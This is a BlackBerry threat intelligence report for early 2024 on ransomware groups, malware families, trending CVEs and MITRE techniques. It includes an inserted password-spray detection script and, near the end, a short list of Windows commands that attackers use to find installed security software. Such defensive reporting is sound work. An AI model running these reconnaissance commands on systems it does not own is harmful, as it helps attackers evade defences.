Actionable Intelligence That Matters
This BlackBerry report provides a comprehensive review of the global threat landscape for the period covering January through March 2024. Report highlights include:
We observed over 630,000 malicious hashes, a per-minute increase of over 40 percent over the previous reporting period.
Read more in the Total Attacks This Period section.
60 percent of all attacks were on critical infrastructure. Of those, 40 percent targeted the financial sector.
Find the details in the Critical Infrastructure section.
56 percent of CVEs were rated 7.0 or higher (with 10 being the most severe). CVEs have been rapidly weaponized in all forms of malware — especially ransomware and infostealers.
Learn more in the Common Vulnerabilities and Exposures section.
New Ransomware Section: We’ve included a new section on the top ransomware groups around the world and the most active ransomware this reporting period.
Learn more in the Who’s Who in Ransomware section.
The BlackBerry® Global Threat Intelligence Reports are published every three months. These frequent updates enable CISOs and other key decision makers to stay informed about the most recent cybersecurity threats and challenges in their industries and geographic locations.
The report is the culmination of the research, analysis, and conclusions of our Cyber Threat Intelligence (CTI) team, our Incident Response (IR) team, and security specialists in our CylanceMDR™ division. Continue scrolling to learn more, download the PDF, or read the executive brief.
Total Attacks This Period
As you will notice in this report, total attacks do not necessarily correlate with the number of unique hashes (new malware). As figures 2 through 6 in the next two sections illustrate, not every attack utilizes unique malware. It depends on the attacker’s motivation, the complexity of the attack, and the goal — e.g., information stealing or financial theft.
BlackBerry cybersecurity solutions stopped over 3,100,000 cyberattacks: this equates to over 37,000 cyberattacks stopped per day.
Attacks By Country
Attacks Stopped
Figure 2 below shows the top five nations where BlackBerry cybersecurity solutions prevented the most cyberattacks. Organizations utilizing BlackBerry solutions in the United States received the most attempted attacks this reporting period. In the Asia-Pacific (APAC) region, Japan, South Korea and Australia also experienced a high level of attacks, earning them spots within our top five. In Latin America (LATAM), customers in Honduras were heavily targeted, earning that country the fifth spot on our list.
Unique Malware
This reporting period, BlackBerry observed a per-minute increase of over 40 percent in novel hashes (unique malware), compared to the September through December 2023 period (Figure 1). Figure 2 shows the five countries where BlackBerry cybersecurity solutions recorded the highest number of unique malware hashes, with the United States receiving the greatest number. South Korea, Japan, and Australia in the Asia-Pacific region retained their rankings from the last three-month period, while Brazil joins the list as a new entry.
As the next sections show, some attackers instead aim to damage physical infrastructure, such as a public utility, by exploiting a vulnerability in its control systems or by infecting a device on its network.
Attacks By Industry
As in our previous report, we have consolidated several key industry sectors under two umbrella sections: Critical Infrastructure and Commercial Enterprise.
Critical infrastructure, as defined by the Cybersecurity and Infrastructure Security Agency (CISA), encompasses 16 sectors including healthcare, government, energy, agriculture, finance and defense.
The increasing digitization of these sectors means their assets are more vulnerable to cybercriminals. Threat actors actively exploit critical systems via vulnerabilities such as system misconfigurations and social engineering campaigns against employees.
Commercial enterprises include manufacturing, capital goods, commercial and professional services, and retail. Businesses are always tempting targets for cyberattacks, and the increased use of connected devices and cloud computing has made it easier to breach their systems. Attackers have also become more sophisticated, often using social engineering to obtain account credentials and distribute malware.
Cyber Story Highlight: International Banks
Mexican Banks and Cryptocurrency Platforms Targeted with AllaKore RAT
In January, BlackBerry cyberthreat analysts uncovered a long-running, financially motivated campaign targeting Mexican banks and cryptocurrency trading platforms with the AllaKore RAT, a modified open-source remote access tool. The threat actors used lures mimicking the Mexican Social Security Institute (IMSS) and legitimate documents to distract users during the installation process, allowing them to steal banking credentials and authentication information. This campaign has been ongoing since 2021, focusing on large Mexican companies with revenues exceeding $100 million. BlackBerry's findings suggest that the threat actor is likely based in Latin America, given the use of Mexico Starlink IPs and Spanish-language instructions in the RAT payload. Read the full article on our blog to learn more.
Critical Infrastructure Threats
Based on our internal telemetry, 60 percent of the industry-specific cyberattacks that BlackBerry cybersecurity solutions encountered were targeted against critical infrastructure. Additionally, 32 percent of unique malware hashes targeted critical infrastructure tenants.
CylanceENDPOINT™ and other BlackBerry cybersecurity solutions stopped over 1.1 million attacks against critical industry sectors, which include finance, healthcare, government and utilities. Almost half of these 1.1 million attacks were in the finance sector. Additionally, government and public sector organizations experienced the greatest diversity of attacks, with over 36 percent of unique hashes targeting this sector.
BlackBerry telemetry recorded several prevalent malware families targeting critical infrastructure around the globe. For instance, the notorious infostealer LummaStealer was observed specifically targeting the food and agriculture industries in Latin America and the energy sector in the APAC region. Notable threats observed during this reporting period included:
- 8Base ransomware: Ransomware operation | Healthcare sector
- Amadey (Amadey Bot): Multifunctional botnet | Government facilities
- Buhti: Ransomware operation | Commercial real estate
- LummaStealer (LummaC2): C-based infostealer | Food and agriculture sector (LATAM) and energy sector (APAC)
- PrivateLoader: Downloader family | Energy sector
- Remcos (RemcosRAT): Commercial-grade remote access tool (RAT) | Food and agriculture sector
- Vidar (VidarStealer): Commodity infostealer | Various sectors:
  - The energy sector in APAC countries
  - The IT sector in LATAM countries
  - The financial services sector in North America
  - The government facilities sector in Europe, the Middle East and Africa (EMEA)
Details on these threats to critical infrastructure are available in the Appendix.
External Threats Faced by Critical Infrastructure
External threats are cyberattacks recorded outside of BlackBerry’s internal telemetry. During this last reporting period, the broader global threat landscape saw a number of notable attacks against critical infrastructure.
Ramifications continue from the late 2023 breach at the U.S.-based Idaho National Laboratory (INL), a research facility for the U.S. Department of Energy (DOE). Attackers breached the laboratory's cloud-based HR management platform Oracle HCM and siphoned the personal data of over 45,000 people. The hacktivist group SiegedSec claimed responsibility for the attack in the weeks following and posted a portion of the stolen data on an online leak forum. Figure 7 provides a timeline of notable threats against critical infrastructure that occurred during this reporting period.
Cyber Story Highlight: Infrastructure, VPNs, and Zero Trust
Emergency Directive Reveals It May Be Time to Replace VPNs
The core functionality of virtual private networks (VPNs) has remained largely unchanged since their inception in 1996, but recent high-profile security breaches and government directives suggest it may be time to reconsider their use.
A key issue is VPNs' "trust but verify" model, which inherently grants trust to users within the network perimeter, making them vulnerable to cyberattacks. Highlighting this risk, the Cybersecurity and Infrastructure Security Agency (CISA) recently issued emergency directives addressing critical VPN vulnerabilities, urging rapid disconnection of at-risk products. Read the full story on our blog.
Commercial Enterprise Threats
Just as industries are impacted by cybersecurity threats, individual companies also battle cyberattacks, especially as they tend to rely more on digital infrastructure for finance, communications, sales, procurement and other business operations. Everything from start-ups to multinational conglomerates is susceptible to cyberthreats, particularly ransomware.
Throughout the last reporting period, BlackBerry cybersecurity solutions blocked 700,000 attacks targeting industries within the commercial enterprise sector.
Based upon our internal telemetry, compared to the previous reporting period, commercial enterprises saw:
- a two percent increase in the number of attacks they faced.
- a 10 percent jump in unique hashes encountered.
Commercial enterprises face threats from infostealers sold via malware as a service (MaaS) operations. Often, these threats deploy additional malware onto a victim’s device. They continue to evolve in a cyber arms race to circumvent security products and traditional antivirus (AV) software. The prevalent malware noted in BlackBerry telemetry includes:
- RedLine (RedLine Stealer): Infostealer
- SmokeLoader: Commonly utilized and versatile malware
- PrivateLoader: Malware facilitator
- RaccoonStealer: MaaS infostealer
- LummaStealer (LummaC2): Malware infostealer
Details on these threats to commercial enterprises are available in the Appendix.
External Threats Faced by Commercial Enterprise
Ransomware is a prevalent scourge against organizations of all sizes and business orientations. Recent examples of ransomware attacks include:
- VF Corporation — a U.S. manufacturer of well-known sportswear brands such as Timberland, The North Face, and Vans — was the victim of a ransomware attack by the ALPHV ransomware gang in December 2023. The attackers stole the data of over 35 million customers, causing delays in order fulfilment and other disruptions during the all-important holiday season.
- Coop Värmland, a Swedish supermarket chain, had its busy holiday period disrupted by a ransomware attack perpetrated by the Cactus ransomware gang.
- A well-known German manufacturer, ThyssenKrupp, suffered a breach in its automotive subdivision in February 2024. The company later said the attack was a failed ransomware attack.
- In March, the Stormous ransomware group attacked the Belgian Duvel Moortgat Brewery, a producer of over 20 brands of beer, and stole 88 GB of data.
Who’s Who in Ransomware
As the above events highlight, ransomware has been a prevalent threat across successive editions of the BlackBerry Global Threat Intelligence Report. For this report, we’ve introduced a section specifically about ransomware groups active in this reporting period.
Ransomware is a universal tool adopted by cybercriminals and organized syndicates alike, targeting victims in all industries around the globe. Most of these groups are financially motivated; they quickly adapt new tactics and techniques to evade traditional cybersecurity defenses and will rapidly exploit any new security vulnerabilities.
Ransomware is increasingly targeting healthcare organizations, a concerning trend. Healthcare is a profitable sector for ransomware groups due to the increasing digitization of healthcare records and the severe consequences that can occur if these services are disrupted. With notable attacks happening globally during this reporting period, these aggressive syndicates can endanger lives and restrict or cut off healthcare workers’ access to patients' crucial personally identifiable information (PII).
Attacks on healthcare can have serious knock-on effects, crippling hospitals, clinics, pharmacies and drug dispensaries; preventing patients from obtaining vital medications; causing ambulances to be re-routed; and disrupting the scheduling of medical procedures. Secondary impacts include data leakage and sensitive patient PII being sold on the dark web. For this reason, we predict healthcare will continue to be heavily targeted both publicly and privately throughout 2024.
Key Ransomware Players This Reporting Period
Following are notable ransomware threat groups from around the globe who were active this reporting period:
Hunters International
Hunters International, a ransomware as a service (RaaS) crime syndicate that’s been in operation since late 2023, rose to prominence in early 2024. The group is possibly a spin-off of the Hive ransomware group, which was shuttered by law enforcement in early 2023. This group employs a double extortion scheme that involves first encrypting the victim’s data for ransom, then demanding more money by threatening to publicly post the stolen data. Hunters International is currently active around the globe.
8Base
Initially observed in 2022, the 8Base ransomware group rose to prominence in late 2023. This prolific group uses a variety of tactics, techniques and procedures (TTPs) and can be highly opportunistic. The group is often quick to exploit newly disclosed vulnerabilities and leverages various ransomware, including Phobos.
LockBit
LockBit, a Russia-based ransomware group, specializes in providing RaaS through its eponymous malware. Discovered in 2020, LockBit has become one of the most aggressive ransomware groups. Notable characteristics include:
- Custom tooling to exfiltrate victim data prior to encryption and host it via a leak site on the dark web.
- Largely targets victims in North America and, secondarily, in LATAM.
- Employs a double extortion strategy.
In February 2024, Operation Cronos, an international law enforcement effort, disrupted LockBit’s operations. However, LockBit appears to have since bounced back, and remains a major player in the ransomware space.
Play
Observed initially in 2022, Play is a multi-extortion ransomware group that hosts stolen data on Tor-based sites that enable anonymous communication, threatening that the data will be leaked if the ransom payment isn’t made. Play often targets small and medium businesses (SMBs), mainly in North America, but also in the EMEA region during this reporting period. The group largely leverages off-the-shelf tools like Cobalt Strike, Empire and Mimikatz for discovery and lateral movement TTPs. The group also utilized Grixba, a custom reconnaissance and infostealing tool that is run prior to ransomware execution.
BianLian
BianLian is a Go-based ransomware that has been in the wild since 2022. The associated group has been active this reporting period, heavily targeting victims based in North America. Like many ransomware groups, BianLian is quick to exploit recently disclosed vulnerabilities, often targeting smaller companies across a number of industries. It uses various off-the-shelf tools including PingCastle, Advanced Port Scanner and SharpShares to gain a foothold on a target system before exfiltrating sensitive data and executing ransomware. This stolen data is then leveraged as an extortion tactic until the ransom is paid.
ALPHV
Often referred to as BlackCat or Noberus, ALPHV is a RaaS operation that has been around since late 2021. The threat group behind ALPHV is highly sophisticated, leveraging the Rust programming language to target Windows, Linux and VMware-based systems. ALPHV tends to target North American victims.
Cyber Story Highlight: Ransomware and Healthcare
12 Days Without Revenue: Ransomware Fallout Continues in Healthcare Sector
In March, the healthcare sector experienced an "unprecedented" ransomware attack that disrupted operations across hospitals and pharmacies, according to the American Hospital Association (AHA). The attack on Change Healthcare, which processes 15 billion healthcare transactions annually, severely affected patient care services such as clinical decision support and pharmacy operations. This disruption led to a 12-day revenue standstill for impacted medical practices and left patients struggling to access vital prescriptions. With the U.S. Department of Health and Human Services’ Office for Civil Rights now investigating, the latest data reveals a significant rise in cyberthreats, with a 256% increase in large hacking breaches over the past five years. The incident underscores the critical need for enhanced cybersecurity measures in the healthcare industry. For a detailed exploration of this pressing issue, read the full story on our blog.
Geopolitical Analysis and Comments
Geopolitical conflicts increasingly drive cyberattacks. Digital technologies can be powerful tools for good, but they can also be abused by state and non-state actors. In the first three months of 2024, lawmakers across Europe, North America and the Asia-Pacific region fell victim to targeted spyware campaigns. Threat actors broke into the IT systems of multiple government departments, compromised military systems, and disrupted critical infrastructure around the world.
While the motives driving these intrusions are often complex and opaque, the most significant, recent incidents involved major geopolitical divides such as Russia’s invasion of Ukraine, mounting aggression between Israel and Iran, and ongoing tensions in the South China Sea and the Indo-Pacific region.
In Ukraine, the cyber dimensions of the war continue to grind on. Contrary to international norms governing lawful conduct in cyberspace, attacks launched against Ukraine continue to fail to distinguish between civilian and military infrastructure. In January, Russian agents tapped into residential webcams in Kyiv allegedly to gather information on the city’s air defense systems before launching a missile attack on the city. Per reports, the attackers manipulated camera angles to gather information on nearby critical infrastructure for more precise missile targeting.
Russian cyberthreat actors were also linked to an attack against Ukraine’s largest mobile phone provider, Kyivstar, destroying significant infrastructure and cutting off access to 24 million customers in Ukraine. This attack came just hours before President Biden met with President Zelenskyy in Washington, D.C. Lawmakers in the EU also discovered that their phones had been infected with spyware. Many of these lawmakers were members of the European Parliament’s security and defense subcommittee, responsible for making recommendations on EU support to Ukraine. In March, Russian attackers also intercepted conversations between German military officials about potential military support to Ukraine, reinforcing the need to protect communications from increased espionage attempts.
As military activity between Iran and Israel has escalated, so have cyberattacks against Israeli government sites. In retaliation, Israeli threat actors disrupted 70 percent of gas stations across Iran. Meanwhile, the U.S. launched a cyberattack against an Iranian military spy ship in the Red Sea that was sharing intelligence with Houthi rebels.
In the Indo-Pacific region, cyberattacks and espionage campaigns attributed to Chinese-backed groups continued to mount. The U.S. Department of Homeland Security’s Cyber Safety Review Board released a major report about the Microsoft Exchange Online incident from the summer of 2023 and documented in detail how Chinese-backed attackers stole source code from Microsoft. The threat group Storm-0558 compromised employees and officials in the U.S. Department of State, the U.S. Department of Commerce, the U.S. House of Representatives, and several government departments in the UK. According to the report, the threat actor managed to download approximately 60,000 emails from the State Department alone.
This was not an isolated incident. In March 2024, the U.S. Department of Justice and the FBI revealed that Chinese attackers had targeted several UK, EU, U.S. and Canadian members of the Interparliamentary Alliance on China.
As noted earlier, attacks against critical infrastructure have risen, particularly in the financial and healthcare sectors. In the first three months of 2024, a massive data breach of a French health insurance company led to the leak of sensitive personal information. In Canada, the Financial Transactions and Reports Analysis Centre (FINTRAC) shut down its systems after a cyber incident. In response, the Canadian government allocated CAN$27 million to enhance FINTRAC’s cyber resiliency and construct data security safeguards.
Governments around the world are investing in stronger cybersecurity in the face of increased cyber espionage and cyberattack attempts. Canada recently announced historic levels of investment in its cyber defenses, and the UK increased its defense spending to 2.5 percent of GDP. Cybersecurity remains one of the top risks for governments and private sector actors alike, and this trend will likely continue so long as geopolitical tensions continue to rise.
Incident Response Observations
Observations of the BlackBerry Incident Response Team
This is a summary of the types of IR engagements the BlackBerry team responded to, as well as security measures organizations can take to prevent such breaches.
- Network Intrusion: Incidents in which the initial infection vector was a vulnerable, Internet-facing system, such as a web server or a virtual private network (VPN) appliance. In some cases, the breach led to the deployment of ransomware within the target's environment and the exfiltration of data.
  - Prevention: Apply security updates to all Internet-exposed systems in a timely manner. (MITRE – External Remote Services, T1133.)
- Insider Misconduct: A current or former employee accessed company resources without authorization.
  - Prevention: Implement strong authentication controls on all systems, and implement formal employee offboarding procedures. (MITRE – Valid Accounts: Cloud Accounts, T1078.004.)
- Ransomware: Ten percent of all incidents responded to were ransomware-based.
  - Prevention: Patch Internet-facing services such as email, VPNs, and web servers in a timely fashion. This can prevent a threat actor who has gained access to an enterprise network via a vulnerable device or system from acting on further objectives, such as deploying ransomware. (MITRE – External Remote Services, T1133.)
  - Prevention: Ensure the organization keeps two copies of all critical data, on two different types of media from the original data source, with at least one copy off-site.
Detecting, containing and recovering from a cybersecurity incident requires rapid detection and response to limit damage. It is imperative that organizations have a well-documented incident response plan in place, along with trained personnel and resources ready to take immediate action at the first signs of a potential breach. This ensures that security teams can detect issues as early as possible, quickly contain and eradicate threats, and mitigate business and brand reputation impacts, monetary losses, and legal risks to the organization.
Threat Actors and Tooling
Threat Actors
Dozens of threat groups mounted cyberattacks in the first three months of 2024. We have highlighted the most impactful attacks here.
LockBit
In February, the NCA, the FBI, and Europol, through a coordinated global effort named “Operation Cronos,” collaborated with law enforcement agencies across 10 countries to take control of the LockBit group’s infrastructure and leak site, gather information from their servers, make arrests, and impose sanctions.
However, less than one week later, the ransomware group regrouped and resumed its attacks, employing updated encryptors and ransom notes that direct victims to new servers following the law enforcement disruption.
LockBit claimed responsibility for cyberattacks against various networks, including the Capital Health hospital network. In each case, they threatened to release confidential data unless prompt ransom payments were made.
Rhysida
APT29
CISA recently warned that APT29 has expanded its targeting to include additional industries and more local governments. Known to use a wide range of custom malware, the threat group has also recently targeted cloud services using compromised service accounts or stolen authentication tokens.
In this reporting period, APT29 was observed accessing a Microsoft test tenant account following a password spray attack, then creating malicious OAuth applications to access corporate email accounts. Furthermore, they targeted German political parties with WINELOADER, a backdoor first observed in January 2024.
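The spray-then-sign-in sequence described above leaves a recognizable shape in sign-in logs. The following detection logic is an added example, not BlackBerry tooling or any vendor's rule; the log lines are constructed, and the "timestamp source_ip user result" layout is an assumed format, not a real product schema.

```python
"""Detect a password-spray pattern, and a spray that ended in a successful sign-in.

Added example, not BlackBerry code. A spray tries one or a few passwords against
many accounts, so the signal is one source failing against many distinct users
in a short window with few failures per user, rather than many failures against
a single account. Log lines are constructed; the layout is an assumption.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

CONSTRUCTED_LOG = """
2024-01-15T08:00:01Z 203.0.113.7 alice FAIL
2024-01-15T08:00:12Z 203.0.113.7 bob FAIL
2024-01-15T08:00:25Z 203.0.113.7 carol FAIL
2024-01-15T08:00:37Z 203.0.113.7 dave FAIL
2024-01-15T08:00:50Z 203.0.113.7 erin FAIL
2024-01-15T08:01:03Z 203.0.113.7 svc-test FAIL
2024-01-15T08:01:15Z 203.0.113.7 svc-test SUCCESS
2024-01-15T08:02:00Z 198.51.100.9 bob FAIL
2024-01-15T08:02:05Z 198.51.100.9 bob FAIL
2024-01-15T08:02:10Z 198.51.100.9 bob FAIL
2024-01-15T08:02:15Z 198.51.100.9 bob FAIL
2024-01-15T08:02:20Z 198.51.100.9 bob FAIL
2024-01-15T08:02:25Z 198.51.100.9 bob FAIL
2024-01-15T08:05:00Z 192.0.2.44 alice FAIL
2024-01-15T08:05:20Z 192.0.2.44 alice FAIL
2024-01-15T08:05:40Z 192.0.2.44 alice SUCCESS
"""
LOG_LINES = CONSTRUCTED_LOG.strip().splitlines()


def parse_log(lines):
    """Return (timestamp, source_ip, user, result) tuples, oldest first."""
    events = []
    for line in lines:
        ts, ip, user, result = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result))
    return sorted(events)


def detect_spray(lines, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Return {source_ip: sorted targeted users} for sources whose failures inside
    any `window` cover at least `min_users` accounts with at most `max_per_user`
    failures each. Brute force against one account (198.51.100.9) and a user
    mistyping a password (192.0.2.44) do not match this shape."""
    fails = defaultdict(list)
    for ts, ip, user, result in parse_log(lines):
        if result == "FAIL":
            fails[ip].append((ts, user))
    alerts = {}
    for ip, events in fails.items():
        targeted = set()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until it spans at most `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            counts = Counter(user for _, user in events[start:end + 1])
            if len(counts) >= min_users and max(counts.values()) <= max_per_user:
                targeted.update(counts)
        if targeted:
            alerts[ip] = sorted(targeted)
    return alerts


def spray_followed_by_success(lines, **kwargs):
    """Escalate: sources flagged by detect_spray that later signed in successfully,
    meaning the spray found a working credential. Returns {source_ip: [users]}."""
    events = parse_log(lines)
    hits = {}
    for ip in detect_spray(lines, **kwargs):
        first_fail = min(ts for ts, src, _, r in events if src == ip and r == "FAIL")
        got_in = sorted({u for ts, src, u, r in events
                         if src == ip and r == "SUCCESS" and ts >= first_fail})
        if got_in:
            hits[ip] = got_in
    return hits


if __name__ == "__main__":
    print("spray sources:", detect_spray(LOG_LINES))
    print("spray with access gained:", spray_followed_by_success(LOG_LINES))
```

Tune `window`, `min_users` and `max_per_user` to the tenant's normal failure rate; the second function is the one worth paging on, since it marks a spray that produced access.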
Akira
Akira has been known to use tools such as:
- AdFind for querying Active Directory.
- Mimikatz and LaZagne for accessing credentials.
- Ngrok for tunneling into networks behind firewalls or other security measures.
- AnyDesk for remote access.
- Advanced IP Scanner for locating devices on a network.
Key Tools Used by Threat Actors
- Mimikatz
- Cobalt Strike
- Ngrok
- ConnectWise
Prevalent Threats by Platform: Windows
Remcos
Remote Access Trojan
Remcos, short for Remote Control and Surveillance, is an application used to remotely access a victim’s device.
Agent Tesla
Infostealer
Agent Tesla is a .NET based Trojan that is often seen sold as a MaaS and is used primarily for credential harvesting.
RedLine
Infostealer
RedLine malware utilizes a wide range of applications and services to illicitly exfiltrate victims’ data, such as credit card information, passwords, and cookies.
RisePro
Infostealer
While updated variations of RisePro were observed in our last report, the infostealer was seen in a new campaign being falsely distributed as “cracked software” on GitHub repositories during this reporting period.
SmokeLoader
Backdoor
SmokeLoader is a modular malware used to download other payloads and steal information. It was originally observed in 2011 but remains an active threat to this day.
Prometei
Cryptocurrency Miner/Botnet
Prometei is a multi-stage cross-platform cryptocurrency botnet primarily targeting Monero coins. It can adjust its payload to target either Linux or Windows platforms. Prometei has been seen used alongside Mimikatz to spread to as many endpoints as possible.
Buhti
Ransomware
Buhti is a ransomware operation that utilizes existing variations of other malware such as LockBit or Babuk to target Linux and Windows systems.
Prevalent Threats by Platform: Linux
XMRig
Cryptocurrency Miner
XMRig continues to be prevalent during this reporting period. The miner targets Monero while enabling the threat actor to use a victim’s system to mine cryptocurrency without their knowledge.
NoaBot/Mirai
Distributed Denial of Service (DDoS)
NoaBot is a slightly more sophisticated Mirai variant. It boasts improved obfuscation techniques compared to Mirai and uses SSH to spread as opposed to Telnet. It is also compiled with uClibc instead of GCC, making detection difficult.
XorDDoS
DDoS
Frequently observed in our telemetry, XorDDoS is a Trojan that targets Internet-facing devices running Linux and coordinates the infected devices as a botnet via command-and-control (C2) instructions. It gets its name from its use of XOR encryption to protect its execution and communication data.
AcidPour
Wiper
Although not present in our own telemetry, a new version of the data wiper AcidPour has been seen in the wild. The latest version of the malware, which is utilized to wipe files on routers and modems, is designed to specifically target Linux x86 devices.
Prevalent Threats by Platform: macOS
RustDoor
Backdoor
RustDoor is a Rust-based backdoor that is primarily distributed disguised as updates for legitimate programs. The malware spreads as FAT binaries containing Mach-O files.
Atomic Stealer
Infostealer
Atomic Stealer (AMOS) remains prevalent with a new version spotted in the wild. The latest version of the stealer drops a Python script to aid in remaining undetected. AMOS targets passwords, browser cookies, autofill data, crypto wallets and Mac keychain data.
Empire Transfer
Infostealer
An infostealer discovered by Moonlock Lab in February 2024. It can “self-destruct” when it detects that it is running in a virtual environment. This helps the malware remain undetected and makes analysis more difficult for defenders. Empire Transfer targets passwords, browser cookies and crypto wallets, and utilizes similar tactics to Atomic Stealer (AMOS).
Prevalent Threats by Platform: Android
SpyNote
Infostealer/RAT
SpyNote utilizes the Android Accessibility Service to capture user data and send captured data to a C2 server.
Anatsa/Teabot
Infostealer
Primarily distributed through the Google Play store as Trojan applications. After initial infection from the Trojan application, Anatsa downloads additional malicious files to the victim’s device from a C2 server.
Vultur
Infostealer/RAT
First discovered in 2021, Vultur has been distributed through Trojan applications and “smishing” (SMS phishing) social engineering techniques. In addition to data exfiltration, a threat actor can also make changes to the file system, modify execution permissions, and control the infected device using Android Accessibility Services.
Coper/Octo
Infostealer/RAT
A variant of the Exobot family. Packaged as a MaaS product, its capabilities include keylogging, SMS monitoring, screen control, remote access and C2 operation.
Common Vulnerabilities and Exposures
Common Vulnerabilities and Exposures (CVEs) provide a framework for identifying, standardizing and publicizing known security vulnerabilities and exposures. As mentioned earlier, cybercriminals are increasingly using CVEs to breach systems and steal data. This reporting period, new vulnerabilities found within Ivanti, ConnectWise, Fortra and Jenkins products offered bad actors new ways to target victims. In addition, the last few months have demonstrated the supply chain risks present in open-source projects with the XZ backdoor, which had been intentionally planted in XZ Utils, a data compression utility available on almost all Linux installations.
Almost 8,900 new CVEs were reported by the National Institute of Standards and Technology (NIST) from January through March. Each CVE's base score is computed from a set of weighted metrics and expresses severity on a scale from zero to 10. The dominant CVE base score was a “7,” which accounted for 26 percent of the total scores. This is an increase of three percent for this CVE score compared to the last reporting period. March holds the record so far this year for the most newly discovered CVEs, with close to 3,350 new CVEs. The Trending CVEs table references specific vulnerabilities listed in the NIST National Vulnerability Database.
Trending CVEs
XZ Utils Backdoor
CVE-2024-3094 (10 Critical)
Unauthorized Access
This malicious code was embedded in XZ Utils versions 5.6.0 and 5.6.1. The backdoor manipulated sshd, which would grant unauthenticated attackers unauthorized access to affected Linux distributions.
Ivanti Zero-Day Vulnerabilities
CVE-2024-21887 (9.1 Critical); CVE-2023-46805 (8.2 High); CVE-2024-21888 (8.8 High); CVE-2024-21893 (8.2 High)
Arbitrary Code Execution
Early this year, authentication bypass and command injection vulnerabilities were found within Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) products. Chained together, they allow a threat actor to craft malicious requests and execute arbitrary commands on the system.
In January, Ivanti also warned about two more vulnerabilities affecting these products: CVE-2024-21888 (a privilege escalation vulnerability) and CVE-2024-21893 (a server-side request forgery vulnerability). Nation-state actors have exploited these zero-day vulnerabilities to deploy custom malware strains.
Windows SmartScreen Bypass
CVE-2024-21412 (8.1 High)
Security Bypass
This is a security feature bypass affecting Microsoft Windows Internet shortcut files. It requires user interaction to bypass the security checks: once the victim opens the file, it triggers a chain of executions that ultimately leads to a malicious script. This zero-day vulnerability was used by a threat group to deploy the DarkMe RAT.
Windows Kernel Elevation Vulnerability
CVE-2024-21338 (7.8 High)
Elevation of Privilege
Exploiting this vulnerability allows an attacker to gain system privileges. The Lazarus Group (a North Korean threat group) exploited this zero-day, found in the Windows AppLocker driver (appid.sys), to gain kernel-level access.
Fortra’s GoAnywhere MFT Exploit
CVE-2024-0204 (9.8 Critical)
Authentication Bypass
In January, Fortra published a security advisory describing a critical authentication bypass in GoAnywhere MFT versions prior to 7.4.1. Exploitation allows an unauthorized user to create an admin user via the administration portal.
Jenkins Arbitrary File Read Vulnerability
CVE-2024-23897 (9.7 Critical)
Remote Code Execution
Jenkins 2.441 and earlier, and LTS 2.426.2, contain a vulnerability in the built-in command line interface that exposes the Jenkins controller file system. It lies in the args4j library, which has a feature that replaces an “@” character followed by a file path in an argument with that file’s contents. This allows an attacker to read arbitrary files on the file system, and could potentially lead to remote code execution.
ConnectWise ScreenConnect 23.9.7 Vulnerability
CVE-2024-1709 (10 Critical); CVE-2024-1708 (8.4 High)
Remote Code Execution
These vulnerabilities affect the ConnectWise ScreenConnect 23.9.7 product, and attackers have been seen leveraging both in the wild. They work in conjunction: CVE-2024-1709 (a critical authentication bypass vulnerability) allows the attacker to create administrative accounts and then exploit CVE-2024-1708 (a path traversal vulnerability), giving unauthorized access to the victim’s files and directories.
Common MITRE Techniques
Understanding threat groups’ high-level techniques can aid in deciding which detection techniques should be prioritized. BlackBerry observed the following Top 20 techniques being used by threat actors in this reporting period.
An upward arrow in the last column indicates that usage of the technique has increased since our last report; a downward arrow indicates that usage has decreased, and an equals (=) symbol means that the technique remains in the same position as in our last report.
Technique Name | Technique ID | Tactic Name | Last Report | Change |
---|---|---|---|---|
Process Injection | T1055 | Privilege Escalation, Defense Evasion | 1 | = |
System Information Discovery | T1082 | Discovery | 3 | ↑ |
DLL Side-Loading | T1574.002 | Persistence, Privilege Escalation, Defense Evasion | 4 | ↑ |
Input Capture | T1056 | Credential Access, Collection | 2 | ↓ |
Security Software Discovery | T1518.001 | Discovery | NA | ↑ |
Masquerading | T1036 | Defense Evasion | 10 | ↑ |
File and Directory Discovery | T1083 | Discovery | 13 | ↑ |
Process Discovery | T1057 | Discovery | 19 | ↑ |
Application Layer Protocol | T1071 | Command-and-control | 6 | ↓ |
Registry Run Keys/Startup Folder | T1547.001 | Persistence, Privilege Escalation | 9 | ↓ |
Non-Application Layer Protocol | T1095 | Command-and-control | 5 | ↓ |
Remote System Discovery | T1018 | Discovery | 15 | ↑ |
Application Window Discovery | T1010 | Discovery | NA | ↑ |
Software Packing | T1027.002 | Defense Evasion | NA | ↑ |
Scheduled Task/Job | T1053 | Execution, Persistence, Privilege Escalation | 8 | ↓ |
Windows Service | T1543.003 | Persistence, Privilege Escalation | 12 | ↓ |
Disable or Modify Tools | T1562.001 | Defense Evasion | 18 | ↑ |
Command and Scripting Interpreter | T1059 | Execution | 7 | ↓ |
Obfuscated Files or Information | T1027 | Defense Evasion | NA | ↑ |
Replication Through Removable Media | T1091 | Initial Access, Lateral Movement | 11 | ↓ |
Using MITRE D3FEND™, the BlackBerry Threat Research and Intelligence team developed a complete list of countermeasures for the techniques observed during this reporting period, which is available in our public GitHub.
The top three techniques are well-known procedures used by adversaries to gather key information to conduct successful attacks. The Applied Countermeasures section contains some examples of their usage and some useful information to monitor.
The impact of the total of techniques and tactics can be seen in the graph below:
The most prevalent tactic this reporting period was Defense Evasion, making up 24 percent of all tactics observed, followed by Discovery at 23 percent and Privilege Escalation at 21 percent.
Applied Countermeasures for Noted MITRE Techniques
Security Software Discovery – T1518.001
This popular technique allows cyberthreat actors to find the list of installed security programs, configurations and sensors on a targeted system or cloud environment. This is very important for an adversary who hopes to stay undetected. For example, if a malicious group runs one of the commands listed below on a compromised system and detects that the environment already has security to spot malicious activity, they will often abort the operation. In other cases, more advanced and persistent groups can differentiate between security applications and find a way to work around the weaker applications. This can result in an adversary gaining control of a system or cloud environment.
Below are command lines that an attacker might use to evaluate your security:
- netsh firewall show
- netsh.exe interface dump
- findstr /s /m /i "defender" *.*
- Tasklist /v
- Powershell Empire Module Get-AntiVirusProduct
- cmd.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
Masquerading – T1036
